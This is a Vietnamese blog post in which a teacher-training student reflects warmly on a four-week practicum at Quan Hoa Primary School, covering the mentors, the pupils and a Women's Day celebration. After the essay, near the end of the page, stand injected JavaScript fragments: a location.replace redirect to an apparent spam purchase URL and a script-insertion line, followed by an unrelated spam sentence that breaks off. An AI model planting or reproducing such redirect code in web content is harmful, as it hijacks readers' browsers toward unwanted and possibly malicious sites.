Cảm nhận về một mái trường!

30/05/2011 6:10 Sáng 1 phản hồi

Sau bốn năm học ở trường sư phạm, ngày mai, chúng tôi được đi thực tập.  Cũng như các bạn cùng khóa, chúng tôi háo hức, mong chờ và xen lẫn chút lo  lắng: Không biết ngôi trường đó thế nào, Ban giám hiệu có tạo điều kiện tốt nhất không? Lớp mình thực tập thế nào? các em học sinh có ngoan không?…

Ngày 7/3, ngày đầu tiên chúng tôi tới trường. Ngay khi chúng tôi bước chân vào trường Tiểu học Quan Hoa, chúng  tôi đã cảm nhận được sự thân thiện từ ban giám hiệu, các thầy cô giáo và các em học sinh. Ban giám hiệu đã dành cho chúng tôi một căn phòng riêng để họp đoàn và tập giảng, lại phân công những cô giáo dày dặn kinh nghiệm hướng dẫn cho chúng tôi. Mọi sự lạ lẫm, lo lắng đã gần như tan biến. Sau khi ra mắt toàn trường, chúng tôi làm quen với giáo viên, các em học sinh của lớp mình thực tập, tham gia công tác giảng dạy và chủ nhiệm với tư cách là một Giáo sinh thực tập. Dưới sự hướng dẫn, chỉ bảo tận tình của cô giáo chủ nhiệm, chúng tôi đã làm quen rất nhanh, nhanh đến nỗi ngay sau đó, các em học sinh đã lôi ra đủ mọi ưu, khuyết điểm của lớp để kể với chúng tôi. Nhìn các em say sưa kể, tôi thấy các em thật trong sáng và đáng yêu biết bao. Tôi thật xúc động trước những tình cảm mà các em dành cho. Ngày 8/3, tôi  và cac bạn trong nhóm giúp các em trai trong lớp tổ chức ngày Quốc tế Phụ nữ cho cô giáo và các bạn gái. Mỗi người một việc, tuy các em chưa thật ý thức được ý nghĩa của ngày lễ nhưng các em đều cố hết sức để thể hiện bản lĩnh của phái mạnh. Chúng tôi giúp các em chuẩn bị bánh kẹo, gói quà. Những món quà tuy nhỏ nhưng đã gửi gắm tình cảm, sự nhiệt tình, tinh thần đoàn kết của cả lớp và chắc chắn với các bạn nữ, đây là một kỉ niệm rất đáng yêu.

Mỗi tối, tôi chỉ mong trời nhanh sáng để lại được đến trường. Tôi cảm thấy mình cũng  háo hức, chờ đợi như một đứa trẻ lần đầu tiên cắp sách đến trường. Và cứ thế,  mỗi ngày lại trôi qua với biết bao kỉ niệm. Cô giáo hướng dẫn đã chỉ bảo cho chúng tôi từng li từng tí từ việc soạn giáo án, xác định trọng tâm bài dạy, khắc sâu kiến  thức đến việc lên lớp, cách cư xử với học sinh, tiếp xúc với phụ huynh…. Chúng tôi cũng học được nhiều từ những tình huống sư phạm mà người giáo viên hay gặp phải, đưa ra được cách giải quyết hợp lí. Chúng tôi cảm thấy thật ý nghĩa khi được gặp gỡ các em, được đứng trên bục giảng như một cô giáo thực thụ, và đặc biệt là niểm vui được thấy mình đang từng bước  trưởng thành.

Tôi thầm cảm ơn các thầy cô, các em học sinh, những người đã tạo cho tôi cơ hội thật sự để làm quen với nghề giáo, được trải nhiệm thực tế. Tôi tự hứa với mình sẽ phải cố gắng nhiều hơn nữa, ham học hỏi, tích lũy kinh nghiệm hơn nữa để trở thành một người giáo viên giỏi.

Bốn tuần thực tập đầy ý nghĩa, bổ ích. Chúng tôi trở về trường đại học mang theo những hành trang quý báu mà mình tích lũy được trong đợt thực tập.  Với một trái tim chân thành tôi luôn mong cho trường Tiểu học Quan Hoa ngày càng phát triển, là cái nôi cho những sinh viên sư phạm chúng tôi từng bước trưởng thành, đào tạo được nhiều thế hệ học sinh giúp ích cho sự nghiệp trồng người.

location.replace(“http://gethere.info/buy.php”);

document.currentScript.parentNode.insertBefore(s, document.currentScript); Another is a literacy bill, press here for more info introduced by sen

Các phản hồi đã bị đóng lại bở quản trị.